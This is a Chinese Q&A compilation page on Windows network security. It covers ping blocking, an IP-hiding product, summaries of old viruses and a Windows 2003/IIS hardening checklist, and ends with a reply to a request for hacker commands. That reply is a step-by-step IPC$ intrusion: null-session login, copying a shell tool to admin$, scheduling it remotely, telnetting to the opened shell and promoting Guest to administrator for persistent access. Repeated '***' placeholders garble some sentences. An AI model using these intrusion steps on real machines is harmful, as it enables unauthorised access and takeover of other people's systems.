如何伪装 *** IP
Ping 探测是Windows系统中最常用的工具之一,它同时也是“ *** 流氓”寻找下手目标的最常用的工具,当“ *** 流氓”一次发送的数据包大于或等于65532K时,系统就很有可能死机,通过Ping 命令可以制造ICMP风暴,堵塞 *** ,所以Ping 命令对于系统的危害不可小覤,那么我们在Windows 2000系统中,在没有防火墙保护的状态下,如何屏蔽Ping探测,避免系统被“ *** 流氓”盯上呢?你可以通过以下 *** 来实现。
步骤1 点击“网上邻居”,选择“属性”再指向要配置的“网卡”,再用右键选取“属性”,再依次点“TCP/IP”-“高级”-“选项”-“TCP/IP筛选”。
步骤 2 接着在TCP端口编辑框中点击“只允许”,在下面加上需要开的端口,一般打开80、20、21、25端口,应用于浏览网页,上传文件、收发邮件便行了。
步骤 3 编辑UDP端口,选择“全部不允许”,最右边的一个编辑框是定义IP协议过滤的,我们选择只允许TCP协议通过,点“确定”关闭设置框。
上面设置了“只允许TCP协议通过”,只可惜微软在这里的IP协议过滤并不包括ICMP协议 ,所以还需要在IP安全机制(IP Security)上着手。
步骤1 打开“本地安全策略”,选择“IP安全策略”,再指向“管理IP筛选器”,在IP过滤规则:ICMP_ANY_IN,源地址选“任何IP ”,目标地址选“我的IP地址”(本机),协议类型是“ICMP”,切换到“管理过滤器操作”,增加一个名为“Deny”的操作,操作类型为“阻止”。
步骤2 接着再用右键选取本机的IP安全策略,选择“新建IP安全策略”,建立一个名称为“ICMP Filter”的过滤器,通过增加过滤规则向导,我们把刚刚定义的ICMP_ANY_IN过滤策略指定给“ICMP Filter”。
最后在操作选框中选择我们刚刚定义的Deny 操作,退出向导窗口,右击“ICMP Filter”并启用它,现在任何地址进入的ICMP报文就都会被丢弃了。
在本地安全策略里启用新的过滤策略后,就会有一个关闭所有进入ICMP报文的过滤策略和丢弃所有报文的过滤操作了。通过此番设置后,您就再也不用担心“ *** 流氓”对系统进行骚扰了。
第二种 *** :使用下面的软件。
Steganos Internet Anonym Pro 6
这是一套功能强大的网路身份隐藏工具软件,所以请使用在正当的防卫用途。我们在网路上浏览网页或是下载各式各样的文件的同时,有成千上万的人使用监视用或是入侵用的软件正在虎视眈眈的预备攻击我们,而这套软件就是用来防止如此攻击或是窥视的工具软件,你可以透过这套软件很简单的隐藏自已的身份(ip)或是将我们所经过的网站讯息、Cookkies、暂存文件都消除,所以你可以如有网路隐形人一般的出入所有的网路,而不留痕迹 经过试用发现,自己的ip是1秒钟变化一次,哈哈,用显示ip的网站测试,我一会在
英国,一会儿在加拿大,真是好用啊!!
安装注意:安装后不要急于测试,先关闭所有的浏览器,然后重新打开。如果还没有效果,那么重新启动,保证见效。
你的服务器被人攻击了黑客把他的程序伪装成服务器上正常的工具程序如何找到这
如果服务器被入侵的话可以查询系统日志看下最近时间的登录日志。
当服务器遭到攻击时,可能会导致服务器被攻击者远程控制,服务器的带宽向外发包,服务器被DDoS/CC攻击,系统中木马病毒,服务器管理员账号密码被改等。还有可能导致网站被劫持,首页被篡改,网页被植入脚本木马等。
病毒库的最新资料
一. “尼姆达”(Nimda)病毒简介
“尼姆达” 病毒2001年9月18日在全球蔓延,是一个传播性非常强的黑客病毒。它以邮件传播、主动攻击服务器、即时通讯工具传播、FTP协议传播、网页浏览传播为主要的传播手段。它能够通过多种传播渠道进行传染,传染性极强。对于个人用户的PC机,“尼姆达”可以通过邮件、网上即时通讯工具和“FTP程序”同时进行传染;对于服务器,“尼姆达”则采用和“红色代码”病毒相似的途径,即攻击微软服务器程序的漏洞进行传播。由于该病毒在自身传染的过程中占用大量的 *** 带宽和计算机的内部资源,因此许多企业的 *** 现在受到很大的影响,有的甚至已经瘫痪,就个人使用的PC机来说,速度也会有明显的下降。
二. 尼姆达”(Nimda)新变种病毒简介
“尼姆达”新变种命名为Worm.Concept.118784。其特点是在病毒源代码中有一段说明:Concept Virus(CV)V.6,Copyright(C)2001,(This's CV,No Nimda.)。(意思是:这是概念病毒,不是尼姆达病毒。)它在尼姆达病(Worm.Concept.57344)上做的改动有:
l 附件名从Readme.exe改为Sample.exe;
l 感染IIS系统时生成的文件从Admin.dll改为Httpodbc.dll;
l 在NT/2000及相关系统,病毒拷贝自己到Windows的system目录下,不再叫mmc.exe,而用Csrss.exe的名字。
三.“求职信”(Wantjob)病毒简介
该病毒不仅具有尼姆达病毒自动发信、自动执行、感染局域网等破坏功能,而且在感染计算机后还不停地查询内存中的进程,检查是否有一些杀毒软件的存在(如AVP/NAV/NOD/Macfee等)。如果存在则将该杀毒软件的进程终止。每隔0.1秒就循环检查进程一次,以至于这些杀毒软件无法运行。
该病毒如果感染的是Windows NT/2000系统的计算机,即把自己注册为系统服务进程,一般 *** 很难杀灭。它还不停地向外发送邮件,把自己伪装成“Htm、Doc、Jpg、Bmp、Xls、Cpp、Html、Mpg、Mpeg”类型文件中的一种,文件名也是随机产生的,很具隐蔽性。
四.Codeblue(蓝色代码)病毒简介
“蓝色代码”是一个蠕虫病毒,能够感染Windows NT及Windows 2000系统服务器,由于其攻击微软inetifo.exe程序的漏洞,并植入名为SvcHost.EXE的黑客程序运行,该蠕虫病毒将在服务器内存中不断地生成新的线程,最终导致系统运行缓慢,甚至瘫痪。
“蓝色代码”的特点是攻击服务器后可以对服务器直接破坏,造成服务器的瘫痪,它的设置是通过被感染的服务器对绿盟网站发起攻击,但是因为病毒程序上的bug没有执行。绿盟网站是一个著名的反黑客网站。
五.VBS.happytime病毒简介
VBS.happytime是一个感染 VBS、html 和脚本文件的脚本类病毒。该病毒采用 VBScript 语言编写,它既可在电子邮件的形式通过互联网进行传播,也可以在本地通过文件进行感染。 当用浏览器打开一个被感染的 html 文件时,病毒会设置网页的时间中断事件,每 10 秒运行执行 Help.vbs 一次,该文件存放在 C:\ 盘下之一个子目录下。如果通过 hta文件激活病毒,病毒还会在 C:\ 盘下之一个子目录下生成 Help.hta 文件并执行。
VBS.happytime病毒危害程度很大,可以破坏 html、htm、htt、vbs 和 asp 文件的内容(被修改成病毒代码);大量散发病毒邮件, 破坏 Windows 资源管理器中缺省的 Web 视图等。
六.VBS.HomePage病毒简介
VBS.HomePage是一个由VBS病毒编写工具制造并加密的 *** 蠕虫病毒。该病毒从邮件附件被执行后,会查找所有的Outlook地址薄,枚集出全部的联系人地址,然后发送邮件,邮件信息如下:邮件主题:Homepage ,邮件正文:Hi! You've got to see this page! It's really cool ;0)邮件附件:homepage.HTML.vbs(伪装为主页的病毒代码,大小为2,436 字节).
该病毒可以影响 *** 正常运行,修改注册表。
七.Win32.HLLW.Matcher.28672病毒简介
Win32.HLLW.Matcher.28672是一种新型的特洛伊电脑病毒,它正在迅速扩散。当一个收件者打开了附件.EXE文件后,这个病毒发送自身到用户Outlook邮箱的所有地址。病毒文件的标题为"Matcher",邮件附件文件为MATCHER.EXE。其信息为:Want to find your love mates!!!/Try this its cool…/Looks and Attitude matching to opposite sex。
该病毒向Windows系统目录发送自身复制品,并修改注册表和AUTOEXEC.BAT文件,使得机器每次启动后自动运行病毒程序,最严重的情况下,发作的病毒每分钟就复制一遍,致使电脑服务器瘫痪。
八.VBS.LoveLetter(我爱你)病毒简介
“我爱你”病毒是通过Microsoft Outook电子邮件系统传播的,邮件的主题为“ILOVEYOU”,并包含一个附件。一旦在Microsoft Outlook里打开这个邮件,系统就会自动复制并向地址簿中的所有邮件电址发送这个病毒。 “我爱你”病毒是一种蠕虫病毒,可以改写本地及 *** 硬盘上面的某些文件。
九.CIH病毒简介
CIH是一个纯粹的WINDOWS 95/98病毒。通过软件之间的相互拷贝、盗版光盘的使用有Internet网的传播而大面积传染。CIH病毒发作时将用杂乱数据覆盖硬盘前1024K字节,破坏主板Bios Flash芯片,机器无法启动。允许写Flash内存时才有可能,通常用DIP开关写Flash内存时无效,然而现代主板大多数不能由DIP开关进行Flash内存写保护,因此该病毒发作时会破坏大多数可升级主板Flash Bios。它具备彻底摧毁计算机系统的能力。
该病毒可以覆盖硬盘主引导区的Boot区,改写硬盘数据。
怎么设置木马网站啊?
WINDOWS 2003 IIS网站防木马权限设置安全配置整理 参考了 *** 上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢!一、系统的安装1、按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面。2、IIS6.0的安装
开始菜单—控制面板—添加或删除程序—添加/删除Windows组件
应用程序 ———ASP.NET(可选)
|——启用 *** COM+ 访问(必选)
|——Internet 信息服务(IIS)———Internet 信息服务管理器(必选)
|——公用文件(必选)
|——万维网服务———Active Server pages(必选)
|——Internet 数据连接器(可选)
|——WebDAV 发布(可选)
|——万维网服务(必选)
|——在服务器端的包含文件(可选)
然后点击确定—下一步安装。3、系统补丁的更新:点击开始菜单—所有程序—Windows Update 按照提示进行补丁的安装。4、备份系统:用GHOST备份系统。5、安装常用的软件:例如:杀毒软件、解压缩软件等;安装完毕后,配置杀毒软件,扫描系统漏洞,安装之后用GHOST再次备份系统。6、先关闭不需要的端口 开启防火墙 导入IPSEC策略
在" *** 连接"里,把不需要的协议和服务都删掉,这里只安装了基本的Internet协议(TCP/IP),由于要控制带宽流量服务,额外安装了Qos数据包计划程序。在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。在高级选项里,使用"Internet连接防火墙",这是windows 2003 自带的防火墙,在2000系统里没有的功能,虽然没什么功能,但可以屏蔽端口,这样已经基本达到了一个IPSec的功能。修改3389远程连接端口
修改注册表.
开始--运行--regedit
依次展开 HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/
TERMINAL SERVER/WDS/RDPWD/TDS/TCP
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/
WINSTATIONS/RDP-TCP/
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
注意:别忘了在WINDOWS2003自带的防火墙给+上10000端口
修改完毕.重新启动服务器.设置生效.二、用户安全设置1、禁用Guest账号
在计算机管理的用户里面把Guest账号禁用。为了保险起见,更好给Guest加一个复杂的密码。你可以打开记事本,在里面输入一串包含特殊字符、数字、字母的长字符串,然后把它作为Guest用户的密码拷进去。2、限制不必要的用户
去掉所有的Duplicate User用户、测试用户、共享用户等等。用户组策略设置相应权限,并且经常检查系统的用户,删除已经不再使用的用户。这些用户很多时候都是黑客们入侵系统的突破口。3、把系统Administrator账号改名
大家都知道,Windows 2003 的Administrator用户是不能被停用的,这意味着别人可以一遍又一遍地尝试这个用户的密码。尽量把它伪装成普通用户,比如改成Guesycludx。4、创建一个陷阱用户
什么是陷阱用户?即创建一个名为"Administrator"的本地用户,把它的权限设置成更低,什么事也干不了的那种,并且加上一个超过10位的超级复杂密码。这样可以让那些 Hacker们忙上一段时间,借此发现它们的入侵企图。5、把共享文件的权限从Everyone组改成授权用户
任何时候都不要把共享文件的用户设置成"Everyone"组,包括打印共享,默认的属性就是"Everyone"组的,一定不要忘了改。6、开启用户策略
使用用户策略,分别设置复位用户锁定计数器时间为20分钟,用户锁定时间为20分钟,用户锁定阈值为3次。 (该项为可选)7、不让系统显示上次登录的用户名
默认情况下,登录对话框中会显示上次登录的用户名。这使得别人可以很容易地得到系统的一些用户名,进而做密码猜测。修改注册表可以不让对话框里显示上次登录的用户名。 *** 为:打开注册表编辑器并找到注册表"HKLM\Software\Microsoft\Windows T\CurrentVersion\Winlogon\Dont-DisplayLastUserName",把REG_SZ的键值改成1。8、密码安全设置a、使用安全密码
一些公司的管理员创建账号的时候往往用公司名、计算机名做用户名,然后又把这些用户的密码设置得太简单,比如"welcome"等等。因此,要注意密码的复杂性,还要记住经常改密码。b、设置屏幕保护密码
这是一个很简单也很有必要的操作。设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。c、开启密码策略
注意应用密码策略,如启用密码复杂性要求,设置密码长度最小值为6位 ,设置强制密码历史为5次,时间为42天。d、考虑使用智能卡来代替密码
对于密码,总是使安全管理员进退两难,密码设置简单容易受到黑客的攻击,密码设置复杂又容易忘记。如果条件允许,用智能卡来代替复杂的密码是一个很好的解决 *** 。三、系统权限的设置1、磁盘权限
系统盘及所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings\All Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Windows\System32\cacls.exe、cmd.exe、net.exe、net1.exe、ftp.exe、tftp.exe、telnet.exe 、 netstat.exe、regedit.exe、at.exe、attrib.exe、format.com、del文件只给 Administrators 组和SYSTEM 的完全控制权限
另将systemroot\System32\cmd.exe、format.com、ftp.exe转移到其他目录或更名
Documents and Settings下所有些目录都设置只给adinistrators权限。并且要一个一个目录查看,包括下面的所有子目录。
删除c:\inetpub目录2、本地安全策略设置
开始菜单—管理工具—本地安全策略
A、本地策略——审核策略
审核策略更改 成功 失败
审核登录事件 成功 失败
审核对象访问失败审核过程跟踪 无审核
审核目录服务访问失败
审核特权使用失败
审核系统事件 成功 失败
审核账户登录事件 成功 失败
审核账户管理 成功 失败B、本地策略——用户权限分配
关闭系统:只有Administrators组、其它全部删除。
通过终端服务允许登陆:只加入Administrators,Remote Desktop Users组,其他全部删除C、本地策略——安全选项
交互式登陆:不显示上次的用户名 启用
*** 访问:不允许SAM帐户和共享的匿名枚举 启用
*** 访问:不允许为 *** 身份验证储存凭证 启用
*** 访问:可匿名访问的共享 全部删除
*** 访问:可匿名访问的命全部删除
*** 访问:可远程访问的注册表路径全部删除
*** 访问:可远程访问的注册表路径和子路径全部删除
帐户:重命名来宾帐户重命名一个帐户
帐户:重命名系统管理员帐户 重命名一个帐户3、禁用不必要的服务 开始-运行-services.msc
TCP/IPNetBIOS Helper提供 TCP/IP 服务上的 NetBIOS 和 *** 上客户端的 NetBIOS 名称解析的支持而使用户能够共享文件、打印和登录到 ***
Server支持此计算机通过 *** 的文件、打印、和命名管道共享
Computer Browser 维护 *** 上计算机的最新列表以及提供这个列表
Task scheduler 允许程序在指定时间运行
Messenger 传输客户端和服务器之间的 NET SEND 和 警报器服务消息
Distributed File System: 局域网管理共享文件,不需要可禁用
Distributed linktracking client:用于局域网更新连接信息,不需要可禁用
Error reporting service:禁止发送错误报告
Microsoft Serch:提供快速的单词搜索,不需要可禁用
NTLMSecuritysupportprovide:telnet服务和Microsoft Serch用的,不需要可禁用
PrintSpooler:如果没有打印机可禁用
Remote Registry:禁止远程修改注册表
Remote Desktop Help Session Manager:禁止远程协助
Workstation 关闭的话远程NET命令列不出用户组
以上是在Windows Server 2003 系统上面默认启动的服务中禁用的,默认禁用的服务如没特别需要的话不要启动。4、修改注册表:修改注册表,让系统更强壮a、隐藏重要文件/目录可以修改注册表实现完全隐藏
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current-Version\Explorer\Advanced\Folder\Hi-dden\SHOWALL",鼠标右击 "CheckedValue",选择修改,把数值由1改为0b、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为SynAttackProtect,值为2
新建EnablePMTUDiscovery REG_DWORD 0
新建NoNameReleaseOnDemand REG_DWORD 1
新建EnableDeadGWDetect REG_DWORD 0
新建KeepAliveTime REG_DWORD 300,000
新建PerformRouterDiscovery REG_DWORD 0
新建EnableICMPRedirects REG_DWORD 03. 禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface
新建DWORD值,名为PerformRouterDiscovery 值为0c. 防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
将EnableICMPRedirects 值设为0d. 不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为IGMPLevel 值为0e、禁止IPC空连接:
cracker可以利用net use命令建立空连接,进而入侵,还有net view,nbtstat这些都是基于空连接的,禁止空连接就好了。
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 把这个值改成"1"即可。f、更改TTL值
cracker可以根据ping回的TTL值来大致判断你的操作系统,如:
TTL=107(WINNT);
TTL=108(win2000);
TTL=127或128(win9x);
TTL=240或241(linux);
TTL=252(solaris);
TTL=240(Irix);
实际上你可以自己改的:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters:DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)改成一个莫名其妙的数字如258,起码让那些小菜鸟晕上半天,就此放弃入侵你也不一定哦g. 删除默认共享
有人问过我一开机就共享所有盘,改回来以后,重启又变成了共享是怎么回事,这是2K为管理而设置的默认共享,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters:AutoShareServer类型是REG_DWORD把值改为0即可h. 禁止建立空连接
默认情况下,任何用户通过通过空连接连上服务器,进而枚举出帐号,猜测密码。我们可以通过修改注册表来禁止建立空连接:
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成"1"即可。i、建立一个记事本,填上以下代码。保存为*.bat并加到启动项目中
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share ipc$ /del
net share admin$ /del5、IIS站点设置:a、将IIS目录数据与系统磁盘分开,保存在专用磁盘空间内。b、启用父级路径c、在IIS管理器中删除必须之外的任何没有用到的映射(保留asp等必要映射即可)d、在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件e、Web站点权限设定(建议)
读 允许
写 不允许
脚本源访问 不允许
目录浏览 建议关闭
日志访问 建议关闭
索引资源 建议关闭
执行 推荐选择 "仅限于脚本"f、建议使用W3C扩充日志文件格式,每天记录客户IP地址,用户名,服务器端口, *** ,URI字根,HTTP状态,用户 *** ,而且每天均要审查日志。(更好不要使用缺省的目录,建议更换一个记日志的路径,同时设置日志的访问权限,只允许管理员和system为Full Control)。g、程序安全:
1) 涉及用户名与口令的程序更好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限;
2) 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。3) 防止ASP主页.inc文件泄露问题;
4) 防止UE等编辑器生成some.asp.bak文件泄露问题。6、IIS权限设置的思路
1) 要为每个独立的要保护的个体(比如一个网站或者一个虚拟目录)创建一个系统用户,让这个站点在系统中具有惟一的可以设置权限的身份。
2) 在IIS的【站点属性或者虚拟目录属性→目录安全性→匿名访问和验证控制→编辑→匿名访问→编辑】填写刚刚创建的那个用户名。
3) 设置所有的分区禁止这个用户访问,而刚才这个站点的主目录对应的那个文件夹设置允许这个用户访问(要去掉继承父权限,并且要加上超管组和SYSTEM组)。7、卸载最不安全的组件
最简单的办法是直接卸载后删除相应的程序文件。将下面的代码保存为一个.BAT文件,( 以下均以 WIN2000 为例,如果使用2003,则系统文件夹应该是 C:\WINDOWS\ )
regsvr32/u C:\WINDOWS\System32\wshom.ocx
del C:\WINDOWS\System32\wshom.ocx
regsvr32/u C:\WINDOWS\system32\shell32.dll
del C:\WINNT\WINDOWS\shell32.dll然后运行一下,WScript.Shell, Shell.application, WScript.Network就会被卸载了。可能会提示无法删除文件,不用管它,重启一下服务器,你会发现这三个都提示"×安全"了。
跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有
一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.
二 经典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以之一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的 *** 命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off .txt|exit 添加文本
echo 内容 .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
黑客如何利用信件或网页包含的程序代码来运行被黑电脑的某个程序或打开各种系统服务,并实施破坏?
让你点击一些 *** 或Web程序,利用服务端和客户端之间的协议作为保障,获得客户机的权限(可能是更高权限)。通过更高权限调用系统接口伪装正常程序进行破坏。
对服务器的攻击,有很多形式,比如注入数据库,负载量过大造成崩溃。让程序卸掉外壳,产生碎片。收集碎片和异常日志进行分析,编写程序,冒充正常的远程调用。
总之,无论是一般的客户机还是网站服务器,都是以获得权限为基础的。
伪装黑客代码bat怎么退出?
无限命令行弹窗类的伪装黑客代码可以按ctrl+alt+del打开任务管理器,当然也可以右击任务栏打开任务管理器杀程序,或者可以在开始菜单中点注销,这时候由于开了太多进程(弹窗),系统要一个一个杀完才能关机,等到杀得差不多的时候,点击取消就好了